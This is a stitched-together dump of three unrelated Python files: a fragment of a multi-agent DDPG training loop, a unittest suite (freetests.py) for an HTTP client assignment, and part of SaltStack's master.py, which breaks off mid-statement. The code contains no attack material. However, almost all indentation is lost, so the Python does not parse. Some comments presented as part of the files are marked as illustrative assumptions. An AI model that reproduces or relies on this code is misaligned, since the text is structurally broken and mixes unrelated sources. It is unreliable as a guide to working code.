env = make_env(args.scenario, None)
n_agents = env.n
env.seed(args.seed)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
num_adversary = 0
n_actions = n_actions(env.action_space)
obs_dims = [env.observation_space[i].shape[0] for i in range(n_agents)]
obs_dims.insert(0, 0)
if 'hetero' in args.scenario:
import multiagent.scenarios as scenarios
groups = scenarios.load(args.scenario + ".py").Scenario().group
agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device, groups=groups)
eval_agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu', groups=groups)
else:
agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device)
eval_agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu')
memory = ReplayMemory(args.replay_size)
feat_dims = []
for i in range(n_agents):
feat_dims.append(env.observation_space[i].shape[0])
# Find main agents index
unique_dims = list(set(feat_dims))
agents0 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[0]]
if len(unique_dims) > 1:
agents1 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[1]]
main_agents = agents0 if len(agents0) >= len(agents1) else agents1
else:
main_agents = agents0
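# Agents are grouped by observation size; the larger group is treated as the
# main agents (used when observation dimensions differ between agent types).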
rewards = []
total_numsteps = 0
updates = 0
exp_save_dir = os.path.join(args.save_dir, args.exp_name)
os.makedirs(exp_save_dir, exist_ok=True)
best_eval_reward, best_good_eval_reward, best_adversary_eval_reward = -1000000000, -1000000000, -1000000000
start_time = time.time()
copy_actor_policy(agent, eval_agent)
torch.save({'agents': eval_agent}, os.path.join(exp_save_dir, 'agents_best.ckpt'))
# for mp test
test_q = Queue()
done_training = Value('i', False)
p = mp.Process(target=eval_model_q, args=(test_q, done_training, args))
p.start()
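# Evaluation runs in a separate process: trained actor weights are copied into
# eval_agent and pushed through test_q every args.eval_freq episodes.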
for i_episode in range(args.num_episodes):
obs_n = env.reset()
env.render()
episode_reward = 0
episode_step = 0
agents_rew = [[] for _ in range(n_agents)]
while True:
# action_n_1 = [agent.select_action(torch.Tensor([obs]).to(device), action_noise=True, param_noise=False).squeeze().cpu().numpy() for obs in obs_n]
action_n = agent.select_action(torch.Tensor(obs_n).to(device), action_noise=True,
param_noise=False).squeeze().cpu().numpy()
next_obs_n, reward_n, done_n, info = env.step(action_n)
env.render()
total_numsteps += 1
episode_step += 1
terminal = (episode_step >= args.num_steps)
action = torch.Tensor(action_n).view(1, -1)
mask = torch.Tensor([[not done for done in done_n]])
next_x = torch.Tensor(np.concatenate(next_obs_n, axis=0)).view(1, -1)
reward = torch.Tensor([reward_n])
x = torch.Tensor(np.concatenate(obs_n, axis=0)).view(1, -1)
memory.push(x, action, mask, next_x, reward)
for i, r in enumerate(reward_n):
agents_rew[i].append(r)
episode_reward += np.sum(reward_n)
obs_n = next_obs_n
n_update_iter = 5
if len(memory) > args.batch_size:
if total_numsteps % args.steps_per_actor_update == 0:
for _ in range(args.updates_per_step):
transitions = memory.sample(args.batch_size)
batch = Transition(*zip(*transitions))
policy_loss = agent.update_actor_parameters(batch, i, args.shuffle)
updates += 1
print('episode {}, p loss {}, p_lr {}'.
format(i_episode, policy_loss, agent.actor_lr))
if total_numsteps % args.steps_per_critic_update == 0:
value_losses = []
for _ in range(args.critic_updates_per_step):
transitions = memory.sample(args.batch_size)
batch = Transition(*zip(*transitions))
val_loss, _, _ = agent.update_critic_parameters(batch, i, args.shuffle)
value_losses.append(val_loss)
updates += 1
value_loss = np.mean(value_losses)
print('episode {}, q loss {}, q_lr {}'.
format(i_episode, value_loss, agent.critic_optim.param_groups[0]['lr']))
if args.target_update_mode == 'episodic':
hard_update(agent.critic_target, agent.critic)
if done_n[0] or terminal:
            print('train episode reward', episode_reward)
episode_step = 0
break
if not args.fixed_lr:
agent.adjust_lr(i_episode)
# writer.add_scalar('reward/train', episode_reward, i_episode)
rewards.append(episode_reward)
# if (i_episode + 1) % 1000 == 0 or ((i_episode + 1) >= args.num_episodes - 50 and (i_episode + 1) % 4 == 0):
if (i_episode + 1) % args.eval_freq == 0:
tr_log = {'num_adversary': 0,
'best_good_eval_reward': best_good_eval_reward,
'best_adversary_eval_reward': best_adversary_eval_reward,
'exp_save_dir': exp_save_dir, 'total_numsteps': total_numsteps,
'value_loss': value_loss, 'policy_loss': policy_loss,
'i_episode': i_episode, 'start_time': start_time}
copy_actor_policy(agent, eval_agent)
test_q.put([eval_agent, tr_log])
env.close()
time.sleep(5)
done_training.value = True
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
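# Each test below swaps one of the handlers above into MyHTTPHandler.get/.post,
# then exercises the HTTP client under test against the local server.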
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
                self.thread = threading.Thread(target=self.run_server)
                self.thread.start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP Get in the wild, these webservers are far less
forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import functools
import os
import re
import sys
import time
import errno
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
from tornado.stack_context import StackContext
from salt.utils.ctx import RequestContext
log = logging.getLogger(__name__)
class SMaster(object):
'''
Create a simple salt-master, this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
'''
        Rotate the AES key when rotation is due
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
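        # The ".dfn" dropfile is written elsewhere (e.g. by salt.crypt.dropfile) to
        # request a key rotation; owner-only permissions indicate a legitimate request.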
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# The lock should be unnecessary, since nothing else should be modifying the secret
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
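# Illustrative master config sketch (an assumption for clarity): the
# time-based trigger and the post-rotation ping handled above can be enabled
# with, for example:
#
#   publish_session: 86400   # rotate the AES key every 24 hours
#   ping_on_rotate: True     # ping minions so they re-authenticate promptly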
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, **kwargs):
super(FileserverUpdate, self).__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
)
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue,
}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
'No update function for the %s fileserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
'%s key missing from configuration. Falling back to '
'default interval of %d seconds',
interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
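# Illustrative sketch of the resulting structure (an assumption, not upstream
# code): with gitfs updating one remote every 60 seconds and roots falling
# back to the default interval, self.buckets might look roughly like:
#
#   {60: OrderedDict({('gitfs', <gitfs update func>): ['remote-id']}),
#    DEFAULT_INTERVAL: OrderedDict({('roots', <roots update func>): None})}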
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check what our max open files (ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... macOS reports RLIM_INFINITY as the
# hard limit, but raising to anything above the soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
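# Illustrative master config sketch (an assumption): the ceiling applied
# above comes from the 'max_open_files' option, e.g.:
#
#   max_open_files: 100000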
def _pre_flight(self):
'''
Run pre-flight checks. If anything in this method fails, the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
try:
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
except TypeError:
git_pillars = []
critical_errors.append(
'Invalid ext_pillar configuration. It is likely that the '
'external pillar type was not specified for one or more '
'external pillars.'
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre-flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
# Since some children have their own ProcessManager, we should wait longer for them to be killed.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
